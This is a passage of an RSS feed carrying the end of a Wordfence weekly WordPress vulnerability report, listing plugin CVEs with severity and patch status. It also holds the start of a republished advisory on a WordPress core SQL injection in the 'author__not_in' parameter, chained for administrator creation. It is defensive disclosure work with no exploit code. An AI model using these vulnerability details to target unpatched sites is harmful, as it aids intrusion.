<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c04449a1-24ac-4dca-932b-fc8c62b53ce6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8e76fe1d-6315-41ae-bde1-47e0bb2264fc" target="_blank" rel="noopener">TinyMCE Templates &lt;= 4.8.1 &#8211; Authenticated (Contributor+) Sensitive Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65535" target="_blank" rel="noopener noreferrer">							CVE-2026-65535						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tinymce-templates" target="_blank" rel="noopener">TinyMCE Templates</a> <span class="wfvr-software-slug">[tinymce-templates]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8e76fe1d-6315-41ae-bde1-47e0bb2264fc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8a276a3e-12c3-4af7-9eb8-a25d20563de7" target="_blank" rel="noopener">Tutor LMS Elementor Addons &lt;= 4.0.0 &#8211; Missing Authorization to Authenticated (Subscriber+) Tutor LMS and Elementor Plugin Activation</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-1372" target="_blank" rel="noopener noreferrer">							CVE-2026-1372						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor-lms-elementor-addons" target="_blank" rel="noopener">Tutor LMS Elementor Addons</a> <span class="wfvr-software-slug">[tutor-lms-elementor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8a276a3e-12c3-4af7-9eb8-a25d20563de7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3681a51f-89a3-4d6a-a292-25e3f0c4b546" target="_blank" rel="noopener">Visual Composer Website Builder &lt;= 45.15.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65568" target="_blank" rel="noopener noreferrer">							CVE-2026-65568						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visualcomposer" target="_blank" rel="noopener">Visual Composer Website Builder</a> <span class="wfvr-software-slug">[visualcomposer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3681a51f-89a3-4d6a-a292-25e3f0c4b546" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dde63254-058d-4151-b79e-33029c03decf" target="_blank" rel="noopener">WP Accessibility Helper (WAH) &lt;= 0.6.6 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-24537" target="_blank" rel="noopener noreferrer">							CVE-2026-24537						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-accessibility-helper" target="_blank" rel="noopener">WP Accessibility Helper (WAH)</a> <span class="wfvr-software-slug">[wp-accessibility-helper]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/15c7bc3e71963fdd7c656346bcf8b159.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="15c7bc3e71963fdd7c656346bcf8b159"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener">Trương Hữu Phúc (truonghuuphuc)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dde63254-058d-4151-b79e-33029c03decf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e0d1b675-7b9a-49ff-a308-075fefca9743" target="_blank" rel="noopener">WP Activity Log &lt;= 5.6.4 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65512" target="_blank" rel="noopener noreferrer">							CVE-2026-65512						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-security-audit-log" target="_blank" rel="noopener">WP Activity Log</a> <span class="wfvr-software-slug">[wp-security-audit-log]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/levon-balyan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6a3af1646bf6ea9898660cdc61712f13.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a3af1646bf6ea9898660cdc61712f13"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/levon-balyan" target="_blank" rel="noopener">Levon Balyan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e0d1b675-7b9a-49ff-a308-075fefca9743" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/68b8167f-808c-4401-bed5-14088b0c1418" target="_blank" rel="noopener">WP Easy Pay – Payment and Donation Form Builder for Square &lt;= 4.5.0 &#8211; Authenticated (Subscriber+) Arbitrary Content Deletion</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-57808" target="_blank" rel="noopener noreferrer">							CVE-2026-57808						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-easy-pay" target="_blank" rel="noopener">WP Easy Pay – Payment and Donation Form Builder for Square</a> <span class="wfvr-software-slug">[wp-easy-pay]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2b7e2a8d4c137f1479be4362c52fd452.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2b7e2a8d4c137f1479be4362c52fd452"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener">dodoh4t</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/68b8167f-808c-4401-bed5-14088b0c1418" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c85a2d47-cabe-4c0b-b329-af93163d3771" target="_blank" rel="noopener">WP Ghost (Hide My WP Ghost) – Security &amp; Firewall &lt;= 7.0.06 &#8211; Two-Factor Authentication Bypass</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59546" target="_blank" rel="noopener noreferrer">							CVE-2026-59546						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hide-my-wp" target="_blank" rel="noopener">WP Ghost (Hide My WP Ghost) – Security &amp; Firewall</a> <span class="wfvr-software-slug">[hide-my-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c85a2d47-cabe-4c0b-b329-af93163d3771" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f455f3a8-7def-49de-b006-51f4a51aa40b" target="_blank" rel="noopener">ЮKassa для WooCommerce &lt;= 2.16.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65457" target="_blank" rel="noopener noreferrer">							CVE-2026-65457						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yookassa" target="_blank" rel="noopener">ЮKassa для WooCommerce</a> <span class="wfvr-software-slug">[yookassa]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f455f3a8-7def-49de-b006-51f4a51aa40b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d8afc698-b9dd-4da8-a3fe-1813a14f6acc" target="_blank" rel="noopener">افزونه پرداخت امن زرین‌پال برای ووکامرس (ZarinPal for WooCommerce) &lt;= 5.1.0 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65460" target="_blank" rel="noopener noreferrer">							CVE-2026-65460						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/zarinpal-woocommerce-payment-gateway" target="_blank" rel="noopener">افزونه پرداخت امن زرین‌پال برای ووکامرس (ZarinPal for WooCommerce)</a> <span class="wfvr-software-slug">[zarinpal-woocommerce-payment-gateway]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d8afc698-b9dd-4da8-a3fe-1813a14f6acc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f533cf9-bec8-48a8-87e3-99117a9948f1" target="_blank" rel="noopener">افزونه حمل و نقل ووکامرس | پست پیشتاز، تیپاکس و پیک موتوری &lt;= 4.4.5 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65536" target="_blank" rel="noopener noreferrer">							CVE-2026-65536						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/persian-woocommerce-shipping" target="_blank" rel="noopener">افزونه حمل و نقل ووکامرس | پست پیشتاز، تیپاکس و پیک موتوری</a> <span class="wfvr-software-slug">[persian-woocommerce-shipping]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f533cf9-bec8-48a8-87e3-99117a9948f1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div></div>
<hr>
<p><em>As a reminder, Wordfence has curated an industry leading vulnerability database with all known WordPress core, theme, and plugin vulnerabilities known as Wordfence Intelligence.</em></p>
<p>This database is continuously updated, maintained, and populated by Wordfence’s highly credentialed and experienced vulnerability researchers through in-house vulnerability research, vulnerability researchers submitting directly to us through our <a href="https://www.wordfence.com/threat-intel/bug-bounty-program/" target="_blank" rel="noopener">Bug Bounty Program</a>, and by monitoring varying sources to capture all publicly available WordPress vulnerability information and adding additional context where we can.</p>
<p><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/07/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-20-2026-to-july-26-2026/" target="_blank" rel="noopener">Wordfence Intelligence Weekly WordPress Vulnerability Report (July 20, 2026 to July 26, 2026)</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>WP2Shell WordPress Exploit Technical Analysis and Real Attack Data</title>
		<link>https://swiftupdates.ca/wp2shell-wordpress-exploit-technical-analysis-and-real-attack-data/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Wed, 29 Jul 2026 17:39:14 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wp2shell-wordpress-exploit-technical-analysis-and-real-attack-data/</guid>

					<description><![CDATA[On July 17th, 2026, the WordPress Security Team released updates to WordPress core addressing a critical vulnerability chain that can be leveraged by unauthenticated attackers to create an administrator account and then execute code through normal administrator capabilities, such as uploading a plugin. The chain consists of two vulnerabilities: an unauthenticated SQL injection vulnerability identified [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>On July 17th, 2026, the WordPress Security Team released updates to WordPress core addressing a critical vulnerability chain that can be leveraged by unauthenticated attackers to create an administrator account and then execute code through normal administrator capabilities, such as uploading a plugin.</p>
<p>The chain consists of two vulnerabilities: an unauthenticated SQL injection vulnerability identified as <a href="https://www.cve.org/CVERecord?id=CVE-2026-60137" target="_blank" rel="noopener">CVE-2026-60137</a>, and a REST API batch request route confusion vulnerability identified as <a href="https://www.cve.org/CVERecord?id=CVE-2026-63030" target="_blank" rel="noopener">CVE-2026-63030</a>, which can be chained with the SQL injection to escalate the impact to unauthenticated administrator account creation.</p>
<p>The primary SQL Injection vulnerability affects WordPress core versions 6.8 through 6.8.5, 6.9 through 6.9.4, and 7.0 through 7.0.1, while the batch confusion vulnerability only affects the latter two ranges. The Wordfence Firewall has already blocked over 11 million exploit attempts targeting this vulnerability.</p>
<p>Our attack data currently reflects only Wordfence customers protected by the premium firewall rule, a small percentage of our user base, underscoring the sheer volume of attacks targeting this vulnerability. Fortunately, the vulnerability affected relatively few major WordPress versions, and the Security Team issued forced automatic updates. As a result, we expect the larger majority of sites are likely no longer vulnerable, and the high attack volume does not necessarily indicate a rise in successful compromises. Regardless, this still highlights the importance of verifying your site is updated sooner rather than later so that it does not become compromised.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against any exploits targeting this vulnerability on July 17, 2026, the day of disclosure. Sites using the free version of Wordfence will receive the same protection 30 days later on August 16, 2026.</p>
<p><strong>Considering this vulnerability is being actively exploited, we urge users to ensure their sites are updated to a patched version of WordPress core as soon as possible.</strong> WordPress sites with automatic background updates enabled should already have been updated to the patched version.</p>
<h2>Vulnerability Summary from Wordfence Intelligence</h2>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bd087d06-5395-4dfd-a288-2c3271a62842" target="_blank" rel="noopener">WordPress Core 6.8 &#8211;  7.0.1 &#8211; Unauthenticated SQL Injection via author__not_in Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-60137" target="_blank" rel="noopener noreferrer">							CVE-2026-60137						</a>					</strong>
				</div>
<div class="affected-versions">
					<span>Affected Version(s)</span><br />
											<strong>Various <span data-bs-toggle="tooltip" title="6.8 - 6.8.5 (exclusive); 6.9 - 6.9.5 (exclusive); 7.0 - 7.0.2 (exclusive)"><i class="text-primary fas fa-info-circle"></i></span></strong>
									</div>
<div class="patched-status">
					<span>Patched Versions</span><br />
					<strong class="patched">6.8.6, 6.9.5, 7.0.2</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8ec93bb7e5ec96ab4636699e413382c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8ec93bb7e5ec96ab4636699e413382c9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener">Tin Pham (TF1T)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trong-pham-dtro" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4418c9327e7455cc20ecc3238895e0d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4418c9327e7455cc20ecc3238895e0d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trong-pham-dtro" target="_blank" rel="noopener">Trong Pham (dtro)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/haongo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/haongo" target="_blank" rel="noopener">haongo</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			WordPress Core is vulnerable to generic SQL Injection via the &#8216;author__not_in&#8217; parameter in versions 6.8 &#8211; 7.0.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bd087d06-5395-4dfd-a288-2c3271a62842" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
